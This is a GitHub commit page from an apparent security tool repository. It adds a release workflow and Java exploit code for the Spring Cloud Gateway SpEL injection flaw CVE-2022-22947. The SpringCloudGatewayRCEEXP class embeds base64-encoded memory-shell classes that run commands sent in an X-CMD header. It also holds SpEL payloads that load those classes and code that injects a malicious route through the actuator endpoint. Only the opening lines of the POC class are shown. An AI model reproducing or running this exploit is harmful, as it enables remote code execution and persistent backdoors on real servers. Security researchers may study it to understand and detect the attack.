This repository has been archived by the owner on Jul 25, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 313
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing
14 changed files
with
537 additions
and
11 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,61 @@ | ||
name: Release Maven | ||
|
||
|
||
|
||
on: | ||
push: | ||
tags: | ||
- '*' | ||
#on: [push] | ||
|
||
|
||
|
||
jobs: | ||
build: | ||
runs-on: ubuntu-latest | ||
|
||
steps: | ||
- uses: actions/checkout@v2 | ||
- name: Set up JDK 1.8 | ||
uses: actions/setup-java@v1 | ||
with: | ||
distribution: "Liberica" | ||
java-version: 1.8 | ||
java-package: jdk+fx | ||
- name: Build with Maven | ||
run: | ||
mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V | ||
- name: Create Release | ||
id: create_release | ||
uses: SummerSec/create-release@master | ||
with: | ||
tag_name: ${{ github.ref }} | ||
release-name: Release ${{ github.ref }} | ||
draft: false | ||
prerelease: false | ||
env: | ||
GITHUB_TOKEN: ${{ secrets.RELEASE }} | ||
|
||
|
||
- name: Upload a Build Artifact | ||
id: upload-build-artifact | ||
uses: actions/upload-artifact@v2.3.1 | ||
with: | ||
# Artifact name | ||
name: # optional, default is artifact | ||
SPATool-${{steps.create_release.outputs.tag}}-SNAPSHOT-all.jar | ||
# A file, directory or wildcard pattern that describes what to upload | ||
path: | ||
target/*-SNAPSHOT-all.jar | ||
# The desired behavior if no files are found using the provided path. | ||
|
||
- name: Auto Upload Release | ||
id: upload-release-asset | ||
uses: actions/upload-release-asset@v1.0.1 | ||
env: | ||
GITHUB_TOKEN: ${{secrets.RELEASE}} | ||
with: | ||
upload_url: ${{ steps.create_release.outputs.upload_url }} | ||
asset_path: /home/runner/work/SPATool/SPATool/target/SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar | ||
asset_name: SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar | ||
asset_content_type: application/java-archive |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,65 @@ | ||
package com.drops.exp; | ||
|
||
import com.drops.utils.HTTPUtils; | ||
import com.drops.utils.StringRandom; | ||
|
||
/** | ||
* @ClassName: SpringCloudGatewayRCEEXP | ||
* @Description: TODO | ||
* @Author: Summer | ||
* @Date: 2022/4/17 19:56 | ||
* @Version: v1.0.0 | ||
* @Description: 参考 https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/ | ||
**/ | ||
public class SpringCloudGatewayRCEEXP { | ||
final static String mem = "yv66vgAAADQBFAoAPgB9CAB+BwB/CABTBwCACgAFAIEKAIIAgwcAhAoAggCFCgCGAIcKAIYAiAoACACJCgAFAIoIAIsKAIwAjQgASwoABQCOCgCPAIMKAI8AkAoABQCRCABOCACSBwCTCgAXAH0KAI8AlAgAlQcAlggAlwsAmACZCACaCACbCwCcAJ0HAJ4LACEAnwgAoAoAoQCiCgChAKMHAKQKAKUApgoApQCnCgCoAKkKACYAqggAqwoAJgCsCgAmAK0JAK4ArwoAFwCwCgAbALELALIAswcAtAkAtQC2CQC3ALgKALkAugoAMgC7CwC8AJ8JAL0AvggAvwoAoQDACwCyAMEJAMIAwwsAxADFBwDGBwDHAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAA9MTmV0dHlNZW1zaGVsbDsBAAhkb0luamVjdAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAVX3ZhbCRkaXNwb3NhYmxlU2VydmVyAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAFHZhbCRkaXNwb3NhYmxlU2VydmVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAHX2NvbmZpZwEABmNvbmZpZwEAEF9kb09uQ2hhbm5lbEluaXQBAAZ0aHJlYWQBAAFpAQABSQEACmdldFRocmVhZHMBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAB3RocmVhZHMBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADbXNnAQASTGphdmEvbGFuZy9TdHJpbmc7AQANU3RhY2tNYXBUYWJsZQcAyAcAyQcAhAcAlgEADW9uQ2hhbm5lbEluaXQBAFcoTHJlYWN0b3IvbmV0dHkvQ29ubmVjdGlvbk9ic2VydmVyO0xpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7TGphdmEvbmV0L1NvY2tldEFkZHJlc3M7KVYBABJjb25uZWN0aW9uT2JzZXJ2ZXIBACJMcmVhY3Rvci9uZXR0eS9Db25uZWN0aW9uT2JzZXJ2ZXI7AQAHY2hhbm5lbAEAGkxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWw7AQANc29ja2V0QWRkcmVzcwEAGExqYXZhL25ldC9Tb2NrZXRBZGRyZXNzOwEACHBpcGVsaW5lAQAiTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAEE1ldGhvZFBhcmFtZXRlcnMBAAtjaGFubmVsUmVhZAEAPShMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7TGphdmEvbGFuZy9PYmplY3Q7KVYBAANjbWQBAApleGVjUmVzdWx0AQALaHR0cFJlcXVlc3QBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXF1ZXN0OwEAA2N0eAEAKExpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxIYW5kbGVyQ29udGV4dDsHAJ4BAApFeGNlcHRpb25zAQAEc2VuZAEAbShMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7TGphdmEvbGFuZy9TdHJpbmc7TGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7KVYBAAdjb250ZXh0AQAGc3RhdHVzAQAwTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXM7AQAIcmVzcG9uc2UBAC5MaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0Z1bGxIdHRwUmVzcG9uc2U7AQAKU291cmNlRmlsZQEAEk5ldHR5TWVtc2hlbGwuamF2YQwAQABBAQAMaW5qZWN0LXN0YXJ0AQAQamF2YS9sYW5nL1RocmVhZAEAD2phdmEvbGFuZy9DbGFzcwwAygDLBwDJDADMAM0BABBqYXZhL2xhbmcvT2JqZWN0DADOAM8HANAMANEA0gwA0wDUDADVANYMANcASAEADk5ldHR5V2ViU2VydmVyBwDIDADYANkMANoA2wcA3AwA0wDdDADeANYBAA9kb09uQ2hhbm5lbEluaXQBAA1OZXR0eU1lbXNoZWxsDADfAOABAA5pbmplY3Qtc3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAxpbmplY3QtZXJyb3IHAOEMAGcA4gEAH3JlYWN0b3IubGVmdC5odHRwVHJhZmZpY0hhbmRsZXIBABBtZW1zaGVsbF9oYW5kbGVyBwDjDADkAOUBACdpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cFJlcXVlc3QMAOYA5wEABVgtQ01EBwDoDADYAOkMANMA6gEAEWphdmEvdXRpbC9TY2FubmVyBwDrDADsAO0MAO4A7wcA8AwA8QDyDABAAPMBAAJcQQwA9AD1DAD2AEgHAPcMAPgAeAwAdAB1DAD5AEEHAPoMAPsA/AEAM2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9EZWZhdWx0RnVsbEh0dHBSZXNwb25zZQcA/QwA/gD/BwEADAEBAQIHAQMMAQQBBQwAQAEGBwEHBwEIDAEJAQoBABl0ZXh0L3BsYWluOyBjaGFyc2V0PVVURi04DADfAQsMAQwBDQcBDgwBDwEQBwERDAESARMBACVpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxEdXBsZXhIYW5kbGVyAQAncmVhY3Rvci9uZXR0eS9DaGFubmVsUGlwZWxpbmVDb25maWd1cmVyAQAQamF2YS9sYW5nL1N0cmluZwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAXamF2YS9sYW5nL3JlZmxlY3QvQXJyYXkBAAlnZXRMZW5ndGgBABUoTGphdmEvbGFuZy9PYmplY3Q7KUkBAANnZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7SSlMamF2YS9sYW5nL09iamVjdDsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAdnZXROYW1lAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEADWdldFN1cGVyY2xhc3MBAANzZXQBACcoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KVYBABhpby9uZXR0eS9jaGFubmVsL0NoYW5uZWwBACQoKUxpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxQaXBlbGluZTsBACBpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxQaXBlbGluZQEACWFkZEJlZm9yZQEAaShMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZztMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlcjspTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbFBpcGVsaW5lOwEAB2hlYWRlcnMBACsoKUxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlcnM7AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBIZWFkZXJzAQAVKExqYXZhL2xhbmcvU3RyaW5nOylaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEALmlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwUmVzcG9uc2VTdGF0dXMBAAJPSwEAD3ByaW50U3RhY2tUcmFjZQEAJmlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEhhbmRsZXJDb250ZXh0AQAPZmlyZUNoYW5uZWxSZWFkAQA8KExqYXZhL2xhbmcvT2JqZWN0OylMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsSGFuZGxlckNvbnRleHQ7AQAnaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uAQAISFRUUF8xXzEBAClMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBWZXJzaW9uOwEAGWlvL25ldHR5L3V0aWwvQ2hhcnNldFV0aWwBAAVVVEZfOAEAGkxqYXZhL25pby9jaGFyc2V0L0NoYXJzZXQ7AQAYaW8vbmV0dHkvYnVmZmVyL1VucG9vbGVkAQAMY29waWVkQnVmZmVyAQBNKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlO0xqYXZhL25pby9jaGFyc2V0L0NoYXJzZXQ7KUxpby9uZXR0eS9idWZmZXIvQnl0ZUJ1ZjsBAHUoTGlvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwVmVyc2lvbjtMaW8vbmV0dHkvaGFuZGxlci9jb2RlYy9odHRwL0h0dHBSZXNwb25zZVN0YXR1cztMaW8vbmV0dHkvYnVmZmVyL0J5dGVCdWY7KVYBACxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvRnVsbEh0dHBSZXNwb25zZQEAK2lvL25ldHR5L2hhbmRsZXIvY29kZWMvaHR0cC9IdHRwSGVhZGVyTmFtZXMBAAxDT05URU5UX1RZUEUBABtMaW8vbmV0dHkvdXRpbC9Bc2NpaVN0cmluZzsBAFUoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7TGphdmEvbGFuZy9PYmplY3Q7KUxpby9uZXR0eS9oYW5kbGVyL2NvZGVjL2h0dHAvSHR0cEhlYWRlcnM7AQANd3JpdGVBbmRGbHVzaAEANChMamF2YS9sYW5nL09iamVjdDspTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZTsBACZpby9uZXR0eS9jaGFubmVsL0NoYW5uZWxGdXR1cmVMaXN0ZW5lcgEABUNMT1NFAQAoTGlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZUxpc3RlbmVyOwEAHmlvL25ldHR5L2NoYW5uZWwvQ2hhbm5lbEZ1dHVyZQEAC2FkZExpc3RlbmVyAQBSKExpby9uZXR0eS91dGlsL2NvbmN1cnJlbnQvR2VuZXJpY0Z1dHVyZUxpc3RlbmVyOylMaW8vbmV0dHkvY2hhbm5lbC9DaGFubmVsRnV0dXJlOwAhABcAPgABAD8AAAAFAAEAQABBAAEAQgAAAC8AAQABAAAABSq3AAGxAAAAAgBDAAAABgABAAAAFgBEAAAADAABAAAABQBFAEYAAAAJAEcASAABAEIAAAHDAAQACgAAALUSAksSAxIEA70ABbYABkwrBLYABysBA70ACLYACU0DPh0suAAKogCHLB24AAs6BBkExgB1GQS2AAy2AA0SDrYAD5kAZRkEtgAMEhC2ABE6BRkFBLYAEhkFGQS2ABM6BhkGtgAMtgAUEhW2ABE6BxkHBLYAEhkHGQa2ABM6CBkItgAMtgAUtgAUEha2ABE6CRkJBLYAEhkJGQi7ABdZtwAYtgAZEhpLhAMBp/93pwAHTBIcSyqwAAEAAwCsAK8AGwADAEMAAABaABYAAAAYAAMAGgAPABsAFAAcAB4AHgAoAB8ALwAgAEQAIQBQACIAVgAjAF8AJABuACUAdAAmAH0AJwCPACgAlQApAKMAKgCmAB4ArAAvAK8ALQCwAC4AswAwAEQAAABwAAsAUABWAEkASgAFAF8ARwBLAEwABgBuADgATQBKAAcAfQApAE4ATAAIAI8AFwBPAEoACQAvAHcAUABMAAQAIACMAFEAUgADAA8AnQBTAFQAAQAeAI4AVQBMAAIAsAADAFYAVwABAAMAsgBYAFkAAABaAAAAHgAF/wAgAAQHAFsHAFwHAF0BAAD7AIX4AAVCBwBeAwABAF8AYAACAEIAAAB2AAUABQAAABwsuQAdAQA6BBkEEh4SH7sAF1m3ABi5ACAEAFexAAAAAgBDAAAADgADAAAANgAIADgAGwA5AEQAAAA0AAUAAAAcAEUARgAAAAAAHABhAGIAAQAAABwAYwBkAAIAAAAcAGUAZgADAAgAFABnAGgABABpAAAADQMAYQAAAGMAAABlAAAAAQBqAGsAAwBCAAABEAAEAAYAAABhLMEAIZkAVCzAACFOLbkAIgEAEiO2ACSZADctuQAiAQASI7YAJToEuwAmWbgAJxkEtgAotgAptwAqEiu2ACy2AC06BSorGQWyAC63AC+xpwAKOgQZBLYAMCssuQAxAgBXsQABAAwATQBRABsAAwBDAAAAMgAMAAAAPwAHAEAADABCABoAQwAnAEQAQwBGAE0ARwBOAEsAUQBJAFMASgBYAE0AYABOAEQAAABIAAcAJwAnAGwAWQAEAEMACwBtAFkABQBTAAUAVgBXAAQADABMAG4AbwADAAAAYQBFAEYAAAAAAGEAcABxAAEAAABhAFgATAACAFoAAAAPAAP8AE4HAHJCBwBe+gAGAHMAAAAEAAEAGwBpAAAACQIAcAAAAFgAAAACAHQAdQACAEIAAACUAAYABQAAADa7ADJZsgAzLSyyADS4ADW3ADY6BBkEuQA3AQCyADgSObYAOlcrGQS5ADsCALIAPLkAPQIAV7EAAAACAEMAAAASAAQAAABSABQAUwAkAFQANQBVAEQAAAA0AAUAAAA2AEUARgAAAAAANgBwAHEAAQAAADYAdgBZAAIAAAA2AHcAeAADABQAIgB5AHoABABpAAAADQMAcAAAAHYAAAB3AAAAAQB7AAAAAgB8"; | ||
|
||
|
||
final static String mem1 = "yv66vgAAADQAjgoABgBLCABMCgAGAE0IADAHAE4HAE8HAFAHAFEKAAUAUgoABwBTBwBUCAAyBwBVBwBWCgAOAEsIAFcKAA4AWAcAWQcAWgoAEgBbCABcCgAIAF0KAAsASwoABwBeCABfBwBgCABhBwBiCgBjAGQKAGMAZQoAZgBnCgAcAGgIAGkKABwAagoAHABrBwBsCQBtAG4KACQAbwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAeTFNwcmluZ1JlcXVlc3RNYXBwaW5nTWVtc2hlbGw7AQAIZG9JbmplY3QBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvU3RyaW5nOwEAFXJlZ2lzdGVySGFuZGxlck1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAOZXhlY3V0ZUNvbW1hbmQBAAtwYXRoUGF0dGVybgEAMkxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi91dGlsL3BhdHRlcm4vUGF0aFBhdHRlcm47AQAYcGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uAQBMTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vUGF0dGVybnNSZXF1ZXN0Q29uZGl0aW9uOwEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAccmVxdWVzdE1hcHBpbmdIYW5kbGVyTWFwcGluZwEAEkxqYXZhL2xhbmcvT2JqZWN0OwEAA21zZwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEADVN0YWNrTWFwVGFibGUHAE8HAFUHAGABABBNZXRob2RQYXJhbWV0ZXJzAQA9KExqYXZhL2xhbmcvU3RyaW5nOylMb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5OwEAA2NtZAEACmV4ZWNSZXN1bHQBAApFeGNlcHRpb25zBwBwAQAKU291cmNlRmlsZQEAIVNwcmluZ1JlcXVlc3RNYXBwaW5nTWVtc2hlbGwuamF2YQwAJwAoAQAMaW5qZWN0LXN0YXJ0DABxAHIBAA9qYXZhL2xhbmcvQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQBBb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8MAHMAdAwAdQB2AQAcU3ByaW5nUmVxdWVzdE1hcHBpbmdNZW1zaGVsbAEAEGphdmEvbGFuZy9TdHJpbmcBADZvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi91dGlsL3BhdHRlcm4vUGF0aFBhdHRlcm5QYXJzZXIBAAIvKgwAdwB4AQBKb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L2NvbmRpdGlvbi9QYXR0ZXJuc1JlcXVlc3RDb25kaXRpb24BADBvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi91dGlsL3BhdHRlcm4vUGF0aFBhdHRlcm4MACcAeQEAAAwAJwB6DAB7AHwBAA5pbmplY3Qtc3VjY2VzcwEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAxpbmplY3QtZXJyb3IBABFqYXZhL3V0aWwvU2Nhbm5lcgcAfQwAfgB/DACAAIEHAIIMAIMAhAwAJwCFAQACXEEMAIYAhwwAiACJAQAnb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5BwCKDACLAIwMACcAjQEAE2phdmEvaW8vSU9FeGNlcHRpb24BAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEABXBhcnNlAQBGKExqYXZhL2xhbmcvU3RyaW5nOylMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvdXRpbC9wYXR0ZXJuL1BhdGhQYXR0ZXJuOwEANihbTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3V0aWwvcGF0dGVybi9QYXRoUGF0dGVybjspVgECJChMamF2YS9sYW5nL1N0cmluZztMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L2NvbmRpdGlvbi9QYXR0ZXJuc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vUmVxdWVzdE1ldGhvZHNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvY29uZGl0aW9uL1BhcmFtc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vSGVhZGVyc1JlcXVlc3RDb25kaXRpb247TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9jb25kaXRpb24vQ29uc3VtZXNSZXF1ZXN0Q29uZGl0aW9uO0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvY29uZGl0aW9uL1Byb2R1Y2VzUmVxdWVzdENvbmRpdGlvbjtMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L2NvbmRpdGlvbi9SZXF1ZXN0Q29uZGl0aW9uOylWAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEABG5leHQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAI29yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzAQACT0sBACVMb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXM7AQA6KExqYXZhL2xhbmcvT2JqZWN0O0xvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czspVgAhAAsABgAAAAAAAwABACcAKAABACkAAAAvAAEAAQAAAAUqtwABsQAAAAIAKgAAAAYAAQAAABQAKwAAAAwAAQAAAAUALAAtAAAACQAuAC8AAgApAAABUwAKAAcAAACSEgJMKrYAAxIEBr0ABVkDEgZTWQQSB1NZBRIIU7YACU0sBLYAChILEgwEvQAFWQMSDVO2AAlOuwAOWbcADxIQtgAROgS7ABJZBL0AE1kDGQRTtwAUOgW7AAhZEhUZBQEBAQEBAbcAFjoGLCoGvQAGWQO7AAtZtwAXU1kELVNZBRkGU7YAGFcSGUynAAdNEhtMK7AAAQADAIkAjAAaAAMAKgAAADYADQAAABYAAwAYACAAGQAlABoANgAbAEQAHABWAB0AaQAeAIYAHwCJACIAjAAgAI0AIQCQACMAKwAAAFIACAAgAGkAMAAxAAIANgBTADIAMQADAEQARQAzADQABABWADMANQA2AAUAaQAgADcAOAAGAI0AAwA5ADoAAgAAAJIAOwA8AAAAAwCPAD0APgABAD8AAAATAAL/AIwAAgcAQAcAQQABBwBCAwBDAAAABQEAOwAAAAEAMgBEAAMAKQAAAGgABAADAAAAJrsAHFm4AB0rtgAetgAftwAgEiG2ACK2ACNNuwAkWSyyACW3ACawAAAAAgAqAAAACgACAAAAJwAaACgAKwAAACAAAwAAACYALAAtAAAAAAAmAEUAPgABABoADABGAD4AAgBHAAAABAABAEgAQwAAAAUBAEUAAAABAEkAAAACAEo="; | ||
|
||
final static String NettyMemshell = String.format("#{T(org.springframework.cglib.core.ReflectUtils).defineClass('NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}", mem); | ||
|
||
final static String SpringRequestMappingMemshell = String.format("#{T(org.springframework.cglib.core.ReflectUtils).defineClass('SpringRequestMappingMemshell',T(org.springframework.util.Base64Utils).decodeFromString('%s'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping)}",mem1); | ||
|
||
|
||
public boolean execute(String target, String type){ | ||
String endpoint = "s" + StringRandom.getRandomString(5); | ||
String body = String.format("{\n" + | ||
" \"id\": \"%s\",\n" + | ||
" \"filters\": [{\n" + | ||
" \"name\": \"AddResponseHeader\",\n" + | ||
" \"args\": {\"name\": \"Result\",\"value\": \"%s\"}\n" + | ||
" }],\n" + | ||
" \"uri\": \"%s\",\n" + | ||
" \"order\": 0\n" + | ||
"}", endpoint, type, target); | ||
|
||
HTTPUtils.postRequestjson(target , "actuator/gateway/routes/" + endpoint, body).toString(); | ||
HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString(); | ||
HTTPUtils.getRequest(target , "actuator/gateway/routes/" + endpoint).toString(); | ||
HTTPUtils.deleteRequest(target , "actuator/gateway/routes/" + endpoint).toString(); | ||
HTTPUtils.postRequestV1(target , "actuator/gateway/refresh").toString(); | ||
String header = "X-CMD: echo "+ endpoint; | ||
|
||
String re6 = HTTPUtils.postRequestV1(target, "?cmd=echo "+ endpoint, header).toString(); | ||
// System.out.println("re6 = " + re6); | ||
if (re6.toLowerCase().contains(endpoint)){ | ||
// System.out.println(String.format("[+] %s inject success", type)); | ||
return true; | ||
} | ||
return false; | ||
} | ||
|
||
public boolean exp(String target){ | ||
|
||
if (execute(target,NettyMemshell)){ | ||
System.out.println("[+] NettyMemshell inject success"); | ||
return true; | ||
}else if (execute(target,SpringRequestMappingMemshell)){ | ||
System.out.println("[+] SpringRequestMappingMemshell inject success"); | ||
return true; | ||
} | ||
return false; | ||
} | ||
|
||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,63 @@ | ||
package com.drops.poc; | ||
|
||
import com.drops.entity.ControllersFactory; | ||
import com.drops.ui.MainController; | ||
import com.drops.utils.HTTPUtils; | ||
import com.drops.utils.StringRandom; | ||
import com.drops.utils.Utils; | ||
|
||
import java.util.Locale; | ||
|
||
/** | ||
* @ClassName: SpringCloudGatwayRCEPOC | ||
* @Description: TODO | ||
* @Author: Summer | ||
* @Date: 2022/4/17 16:55 | ||
* @Version: v1.0.0 | ||
* @Description: | ||
CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE | ||
**/ | ||
public class SpringCloudGatewayRCEPOC { | ||
|
||
private final MainController mainController; | ||
